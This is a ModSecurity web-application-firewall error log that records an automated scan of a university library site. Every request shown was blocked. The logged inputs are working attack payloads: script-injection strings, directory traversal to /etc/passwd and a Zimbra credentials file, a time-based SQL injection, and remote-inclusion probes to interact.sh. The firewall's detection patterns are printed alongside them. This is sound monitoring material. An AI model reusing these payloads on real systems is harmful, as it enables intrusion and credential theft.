[Tue Aug 29 11:52:06.631465 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAn9598AAAAD"]
[Tue Aug 29 11:52:08.547126 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAnd3EcAAAAI"]
[Tue Aug 29 11:52:08.689203 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAhoHUIAAAAl"]
[Tue Aug 29 11:52:09.597460 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAnkwfEAAAAY"]
[Tue Aug 29 11:52:09.713704 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAn40zcAAAAW"]
[Tue Aug 29 11:52:10.697725 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAnTlMQAAAAA"]
[Tue Aug 29 11:52:11.699309 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAn0Gb0AAAAa"]
[Tue Aug 29 11:52:11.753368 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAlUlp8AAAA0"]
[Tue Aug 29 11:52:12.546240 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAjdQakAAAAZ"]
[Tue Aug 29 11:52:13.576017 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAlIBkYAAAAn"]
[Tue Aug 29 11:52:13.583056 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAn95@wAAAAD"]
[Tue Aug 29 11:52:14.671870 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAnoOp8AAAAf"]
[Tue Aug 29 11:52:14.698981 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAjdQbMAAAAZ"]
[Tue Aug 29 11:52:14.716721 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAnn2BkAAAAe"]
[Tue Aug 29 11:52:15.628114 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/download"] [unique_id "ZO15f8Co-f0AAAnIlpoAAAAV"]
[Tue Aug 29 11:52:15.697557 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAnTlNsAAAAA"]
[Tue Aug 29 11:52:16.567582 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gMCo-f0AAAnIlpsAAAAV"]
[Tue Aug 29 11:52:16.581232 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAlIBlIAAAAn"]
[Tue Aug 29 11:52:17.707072 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAn40zoAAAAW"]
[Tue Aug 29 11:52:17.844541 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAni-AsAAAAU"]
[Tue Aug 29 11:52:17.912919 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAjdQcEAAAAZ"]
[Tue Aug 29 11:52:18.625753 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15gsCo-f0AAAnHQjAAAAAT"]
[Tue Aug 29 11:52:19.741281 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAjdQcQAAAAZ"]
[Tue Aug 29 11:52:20.867618 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hMCo-f0AAAjdQcYAAAAZ"]
[Tue Aug 29 11:52:21.880009 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hcCo-f0AAAnkwiIAAAAY"]
[Tue Aug 29 11:52:23.591590 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAoLfE4AAAAG"]
[Tue Aug 29 11:52:24.793675 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAnHQjgAAAAT"]
[Tue Aug 29 11:52:24.864264 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15iMCo-f0AAAn0GdoAAAAa"]
[Tue Aug 29 11:52:25.589598 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAoN9cEAAAAJ"]
[Tue Aug 29 11:52:26.548107 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAoO5ywAAAAK"]
[Tue Aug 29 11:52:26.629062 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAfWONsAAAAL"]
